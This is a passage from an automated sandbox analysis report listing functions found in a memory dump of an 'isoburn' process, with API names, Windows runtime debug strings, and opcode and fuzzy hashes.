                                                          • Opcode Fuzzy Hash: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                          • Instruction Fuzzy Hash: E12155B044474DDBCF14DF90D459ADEBBF1FF14348F8250A8E819AE202C77582A9CB89
                                                          Function 0525B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 99e32103033cb5cd5bd5d1985aca30542789fc4a05ef8f26f309d6e6cf2365d1
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 04819171E3924A9EDF28CF68C8957FEBBA2BF45330F184159DCA7A7290C77498448B50
                                                          Function 052C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 3d0b0251abcb917d55219d72bf39823ae1f337d82bca83ccf28e2a31cfc43be3
                                                          • Instruction ID: 760966eb40cd9befe75bd682698d2089977d5cd94ec476a52a763f833724d82a
                                                          • Opcode Fuzzy Hash: 3d0b0251abcb917d55219d72bf39823ae1f337d82bca83ccf28e2a31cfc43be3
                                                          • Instruction Fuzzy Hash: 4421957AA20219EBCB10DF79CC44AFEBBF9EF54654F04015AE945E3242EB70D9018BA0
                                                          Function 0523F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 0528031E
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052802BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052802E7
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: e9301dae25ddbd0adda8ac6825de34dd5939a2c266ef7eb655188c3180f4c609
                                                          • Instruction ID: 6be12c876125b0f39294c5d2c8cdf2ef01b1487cdf148e4580170d3c12f1e2f5
                                                          • Opcode Fuzzy Hash: e9301dae25ddbd0adda8ac6825de34dd5939a2c266ef7eb655188c3180f4c609
                                                          • Instruction Fuzzy Hash: 73E10570A28742DFD724DF28D989B2AB7E1BF44324F140A6DF469872D0D778E844CB42
                                                          Function 0524BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 05287BAC
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05287B7F
                                                          • RTL: Resource at %p, xrefs: 05287B8E
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 6a1b66321f5bc68f2a5c9d52bfcf219b1e193d4caf2188b378156ac2ef41325f
                                                          • Instruction ID: 55c69e8bebe82901fa3b35730342a465b751b1a139e4a58a7926697014b18ca0
                                                          • Opcode Fuzzy Hash: 6a1b66321f5bc68f2a5c9d52bfcf219b1e193d4caf2188b378156ac2ef41325f
                                                          • Instruction Fuzzy Hash: D441EF317257029FCB29DE24C940B2AB7E6FF88720F140A1DF95ADB280DB71E8058F91
                                                          Function 0524B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0528728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 052872C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05287294
                                                          • RTL: Resource at %p, xrefs: 052872A3
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: e4b7c5b687fa131afda20a611b68e998112d8637f4960653662e65f068083c8c
                                                          • Instruction ID: 716895163e863a8e16b6ca2f4c3f815fc1b5c88b1c0e630c55e52b37423c35d5
                                                          • Opcode Fuzzy Hash: e4b7c5b687fa131afda20a611b68e998112d8637f4960653662e65f068083c8c
                                                          • Instruction Fuzzy Hash: BA41D035725202ABDB25EE64CC41F66B7A5FF44710F240619F959DB280DB32E852CBD0
                                                          Function 052C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 093cb9d126de8856fe0f4c83c4552b8d24d4df278fc6b217b0613627b6f658b6
                                                          • Instruction ID: 4f9331668851f59adaa6c690fc340e4a4778fa2dcde98ad97d223ced4d5d2f95
                                                          • Opcode Fuzzy Hash: 093cb9d126de8856fe0f4c83c4552b8d24d4df278fc6b217b0613627b6f658b6
                                                          • Instruction Fuzzy Hash: 17316876620219DFCB24DE29CC44BEEB7B8FF44610F5445DAE889E3241EF309A549BA0
                                                          Function 05257D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 2365c6d8e54386b8e3b50609d849130a8ca5013da62454fed10303df6da86d11
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: D191A370EA42179BDF24DE69C880ABEB7A6FF443B0F68452AFC59E72C0D77099418750
                                                          Function 05219126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 48ecb43d87627cfc617c449d2a002e5f6e6e2467a366191e2ed66b4c7245cb79
                                                          • Instruction ID: f2e1c17f7b7c149dbd3556e0fbabee4f938303c821330ae900510cfadfac7db9
                                                          • Opcode Fuzzy Hash: 48ecb43d87627cfc617c449d2a002e5f6e6e2467a366191e2ed66b4c7245cb79
                                                          • Instruction Fuzzy Hash: 5D810976D20269DBDB25CB54CC59BEAB7B9AF08710F0041EAE91DB7240D7709E84CFA4